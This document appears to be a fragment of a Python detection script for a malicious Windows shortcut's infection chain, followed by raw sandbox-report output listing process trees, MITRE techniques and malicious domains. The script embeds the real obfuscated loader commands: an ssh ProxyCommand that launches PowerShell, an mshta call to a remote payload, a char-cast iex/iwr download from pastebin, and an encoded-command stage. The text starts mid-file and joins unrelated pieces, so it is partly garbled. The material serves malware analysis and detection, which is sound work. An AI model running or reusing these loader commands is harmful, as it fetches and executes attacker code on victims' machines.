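STUFFED = "m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]"
CHAR_EXPR = "[chaR] 0X68 + [cHaR] 0X74 + [ChAr] 0X74 + [cHAR] 0x70 + [CHAR] 0x73 + [cHar] 0X3A + [CHaR] 0x2F + [ChAR] 0X2F + [chAr] 0X70 + [cHAr] 0x61 + [char] 0x73 + [CHAR] 0X74 + [CHAr] 0x65 + [chAr] 0X62 + [Char] 0X69 + [ChaR] 0x6E + [cHAr] 0X2E + [chAR] 0x63 + [CHar] 0x6F + [chAr] 0x6D + [ChAR] 0x2F + [ChaR] 0X72 + [ChAr] 0x61 + [ChAR] 0x77 + [chaR] 0x2F + [CHar] 0x30 + [cHAr] 0X76 + [chAR] 0X36 + [CHAR] 0X56 + [Char] 0x68 + [ChAR] 0X76 + [ChaR] 0X70 + [char] 0x62"
DECODED_ENC = "iex( Iwr (" + CHAR_EXPR + "))"  # tail of the report's "Base64 decoded" entry


# Layer 1: junk-character stuffing, undone at run time by  -replace ']'
def unstuff(text: str, junk: str = "]") -> str:
    return text.replace(junk, "")


# Layer 2: a string assembled from  [char] 0xNN + [char] 0xNN + ...
CHAR_CAST = re.compile(r"\[\s*char\s*\]\s*0x([0-9a-f]{1,2})", re.I)


def join_char_casts(expr: str) -> str:
    return "".join(chr(int(h, 16)) for h in CHAR_CAST.findall(expr))


# Layer 3: the EhNo helper, -split ($s -replace '..', '0x$& '), turns a hex
# string into "0xNN" tokens, i.e. the same bytes.  Its argument is truncated
# in the report, so only the mechanism is reproduced here.
def ehno(hexstr: str) -> bytes:
    return bytes.fromhex(hexstr)


# Layer 4: -EncodedCommand is base64 of UTF-16LE text.
def decode_encoded_command(blob: str) -> Optional[str]:
    # Heuristic: base64 is case-sensitive.  The -Enc blob quoted in this report
    # was lower-cased by the sandbox, so it cannot be recovered from the page;
    # the report's own "Base64 decoded" entry is the plaintext to work from.
    if blob == blob.lower():
        return None
    return base64.b64decode(blob).decode("utf-16-le")


# Constructed process-creation records (parent image, image, command line)
# that mirror the chain in this report; truncated payload bodies are omitted.
EVENTS = [
    ("unknown", "ssh.exe",
     "ssh.exe -o proxycommand=\"powershell powershell -command ('" + STUFFED + "' -replace ']')\" ."),
    ("ssh.exe", "powershell.exe",
     "powershell powershell -command ('" + STUFFED + "' -replace ']')"),
    ("powershell.exe", "mshta.exe",
     "mshta.exe https://cndef1.green-pathways.shop/api/reg/z.mp4"),
    ("mshta.exe", "powershell.exe",
     "powershell.exe -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo('...')"),
    ("powershell.exe", "powershell.exe",
     "powershell.exe -NoP -ExecutionPolicy RemoteSigned -Enc iaagacaawwboaeuavaauahmazqbyafya"),
]

# Detection predicates over (parent, image, command line).  Names are this
# example's own and do not claim to reproduce the Sigma rules cited above.
RULES = [
    ("ssh.exe used as a proxy launcher (-o ProxyCommand)",
     lambda p, i, c: i == "ssh.exe" and "proxycommand=" in c.lower()),
    ("mshta.exe started with a remote URL",
     lambda p, i, c: i == "mshta.exe" and re.search(r"https?://", c, re.I) is not None),
    ("mshta.exe spawned PowerShell",
     lambda p, i, c: p == "mshta.exe" and i == "powershell.exe"),
    ("PowerShell execution policy weakened on the command line",
     lambda p, i, c: i == "powershell.exe"
     and re.search(r"-(ep|executionpolicy)\s+(unrestricted|bypass|remotesigned)", c, re.I) is not None),
    ("PowerShell -EncodedCommand",
     lambda p, i, c: i == "powershell.exe"
     and re.search(r"\s-e(c|nc|ncodedcommand)?\s", c, re.I) is not None),
]


def triage(events) -> list:
    """Return (image, rule name) pairs for every predicate that fires."""
    return [(image, name) for parent, image, cmd in events
            for name, pred in RULES if pred(parent, image, cmd)]


def extract_urls(texts: Iterable[str]) -> set:
    """Strip the text-level obfuscation layers and collect the URLs."""
    urls = set()
    for text in texts:
        if "-replace ']'" in text:
            text = unstuff(text)
        text += " " + join_char_casts(text)
        urls.update(re.findall(r"https?://[\w./-]+", text, re.I))
    return urls


if __name__ == "__main__":
    for image, name in triage(EVENTS):
        print(f"{image:15} {name}")
    print(sorted(extract_urls([e[2] for e in EVENTS] + [DECODED_ENC])))
```

Run it directly to print the predicates that fire for each constructed record and the two recovered URLs; the -Enc decoder returns None for the lower-cased blob and the UTF-16LE plaintext for a properly cased one.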
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (5 identical entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (4 identical entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 identical entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (3 identical entries)
        Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (3 identical entries)
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (4 identical entries)
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (3 identical entries)
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        MITRE ATT&CK matrix, listed by tactic (a number in front of a technique is the count shown next to it in the report):
        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
        Execution: 2 Command and Scripting Interpreter; 2 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers
        Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
        Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
        Defense Evasion: 11 Masquerading; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
        Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
        Discovery: 11 Security Software Discovery; 11 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 23 System Information Discovery; Remote System Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
        Collection: 1 Email Collection; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
        Command and Control: 1 Web Service; 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
        Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
        Behavior Graph ID: 1576547, Sample: Instruction_695-18112-002_R..., Startdate: 17/12/2024, Architecture: WINDOWS, Score: 100
        Sample-level DNS/IP: pastebin.com (Connects to a pastebin service (likely for C&C)); cndef1.green-pathways.shop; 6 other IPs or domains
        Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Windows shortcut file (LNK) starts blacklisted processes; 7 other signatures
        Process tree:
        • ssh.exe started: Windows shortcut file (LNK) starts blacklisted processes
          • powershell.exe started: Windows shortcut file (LNK) starts blacklisted processes; Found suspicious powershell code related to unpacking or dynamic code loading
            • powershell.exe started: Windows shortcut file (LNK) starts blacklisted processes
              • mshta.exe started: cndef1.green-pathways.shop 104.21.83.229, 443, 49704, CLOUDFLARENETUS United States; Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found
                • powershell.exe started: Windows shortcut file (LNK) starts blacklisted processes; Encrypted powershell cmdline option found
                  • powershell.exe started: berb.fitnessclub-filmfanatics.com 104.21.66.20, 443, 49739, CLOUDFLARENETUS United States; pastebin.com 172.67.19.24, 443, 49708, CLOUDFLARENETUS United States; 2 other IPs or domains
                  • conhost.exe started
            • conhost.exe started
          • conhost.exe started
        • svchost.exe started: 127.0.0.1 unknown unknown

        Source | Detection | Scanner | Label | Link
        Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | 35% | Virustotal | | Browse
        Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | 26% | ReversingLabs | Shortcut.Trojan.Generic |
        Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | 100% | Joe Sandbox ML | |
        No Antivirus matches
        Source | Detection | Scanner | Label
        https://cndef1.green-pathways.shop/api/reg/z.mp4$global:? | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4f | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4H | 0% | Avira URL Cloud | safe
        https://360.net | 0% | Avira URL Cloud | safe
        https://berb.fitnessclub-filmfanatp | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4U | 0% | Avira URL Cloud | safe
        https://360.net9 | 0% | Avira URL Cloud | safe
        http://www.360.net | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4 | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4Q | 0% | Avira URL Cloud | safe
        https://360.net/ | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4... | 0% | Avira URL Cloud | safe
        https://cndef1.gX | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp45 | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp46 | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp41 | 0% | Avira URL Cloud | safe
        https://berb.fitnessclub-filmfanatics.com | 100% | Avira URL Cloud | malware
        https://cndef1.green-pathways.shop/api/reg/z.mp42S3 | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4( | 0% | Avira URL Cloud | safe
        https://www.360.net/H | 0% | Avira URL Cloud | safe
        https://cndef1.g | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp459 | 0% | Avira URL Cloud | safe
        http://360.net | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4przq | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp40 | 0% | Avira URL Cloud | safe
        https://berb.fitnessclub-filmfanatics.com/naailq0.cpl | 100% | Avira URL Cloud | malware
        https://cndef1.green-pathways.shop/api/reg/z.mp4Yi | 0% | Avira URL Cloud | safe
        https://www.360.net/ | 0% | Avira URL Cloud | safe
        https://www.360.net | 0% | Avira URL Cloud | safe
        http://berb.fitnessclub-filmfanatics.com | 100% | Avira URL Cloud | malware
        https://cndef1.green-pathways.shop/api/reg/z.mp4C: | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4332c3237382c3237392c3238302c3230302c3237302c3238352c | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4http | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/a | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4 | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4owsPowerShel | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4werLMEMhx | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4m | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/ | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4i | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4p | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4g | 0% | Avira URL Cloud | safe
        https://cndef1.green-pathways.shop/api/reg/z.mp4hZ | 0% | Avira URL Cloud | safe
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        360.net | 180.163.242.102 | true | false | | unknown
        www.360.net | 180.163.242.102 | true | false | | unknown
        cndef1.green-pathways.shop | 104.21.83.229 | true | true | | unknown
        www.wshifen.com | 103.235.47.188 | true | false | | high
        berb.fitnessclub-filmfanatics.com | 104.21.66.20 | true | false | | unknown
        pastebin.com | 172.67.19.24 | true | false | | high
        www.baidu.com | unknown | unknown | false | | high
        Name | Malicious | Antivirus Detection | Reputation
        https://berb.fitnessclub-filmfanatics.com/naailq0.cpl | false | Avira URL Cloud: malware | unknown
        https://pastebin.com/raw/0v6Vhvpb | false | | high
        https://www.360.net/ | false | Avira URL Cloud: safe | unknown
        https://cndef1.green-pathways.shop/api/reg/z.mp4 | true | Avira URL Cloud: safe | unknown
        https://www.baidu.com/ | false | | high
        Name | Source | Malicious | Antivirus Detection | Reputation
                                                                      high
                                                                      http://berb.fitnessclub-filmfanatics.compowershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://www.360.netpowershell.exe, 00000009.00000002.2356233458.000002950E7CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://pss.bdstatic.com/static/superman/font/iconfont-74fcdd51ab.svg#iconfontpowershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.wshifen.compowershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cndef1.green-pathways.shop/api/reg/z.mp4C:powershell.exe, 00000004.00000002.2080055561.0000024FC5720000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205299876.00000291539E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000009.00000002.2356233458.000002950CF2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E94C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.baidu.compowershell.exe, 00000009.00000002.2356233458.000002950E7CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://cndef1.green-pathways.shop/api/reg/z.mp4332c3237382c3237392c3238302c3230302c3237302c3238352cmshta.exe, 00000005.00000003.2200411563.000002995A682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://cndef1.green-pathways.shop/apowershell.exe, 00000002.00000002.2085750541.0000018A0EB15000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4httpmshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://g.live.com/odclientsettings/Prod/C:edb.log.6.drfalse
                                                                                  high
                                                                                  https://cndef1.green-pathways.shop/api/reg/z.mp4werLMEMhxmshta.exe, 00000005.00000002.2208459188.000002995A4B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2192822020.000002995A4A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://cndef1.green-pathways.shop/api/reg/z.mp4ppowershell.exe, 00000004.00000002.2078120843.0000024FAD721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2078120843.0000024FAD86E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://cndef1.green-pathways.shop/api/reg/z.mp4owsPowerShelpowershell.exe, 00000004.00000002.2077226110.0000024FAB730000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://cndef1.green-pathways.shop/mshta.exe, 00000005.00000003.2190556968.0000029153A92000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://cndef1.green-pathways.shop/api/reg/z.mp4mmshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://pss.bdstatic.com/static/superman/font/iconfont-cdfecb8456.eotpowershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cndef1.green-pathways.shop/api/reg/z.mp4imshta.exe, 00000005.00000002.2206174245.0000029153C10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://cndef1.green-pathways.shop/api/reg/z.mp4gmshta.exe, 00000005.00000003.2192577700.0000029153A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2197047004.0000029153A1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205452333.0000029153A1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2193156194.0000029153A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2085750541.0000018A0E669000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2078120843.0000024FAD73B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2078120843.0000024FAD77E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2131766032.0000022C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950C9C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://pss.bdstatic.com/static/superman/font/iconfont-cdfecb8456.eot?#iefixpowershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://pastebin.compowershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://cndef1.green-pathways.shop/api/reg/z.mp4hZmshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://pastebin.compowershell.exe, 00000009.00000002.2356233458.000002950DDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://oneget.orgpowershell.exe, 00000007.00000002.2131766032.0000022C8023A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
IP               Domain                              Country        ASN    ASN Name                                          Malicious
104.21.66.20     berb.fitnessclub-filmfanatics.com   United States  13335  CLOUDFLARENETUS                                   false
172.67.19.24     pastebin.com                        United States  13335  CLOUDFLARENETUS                                   false
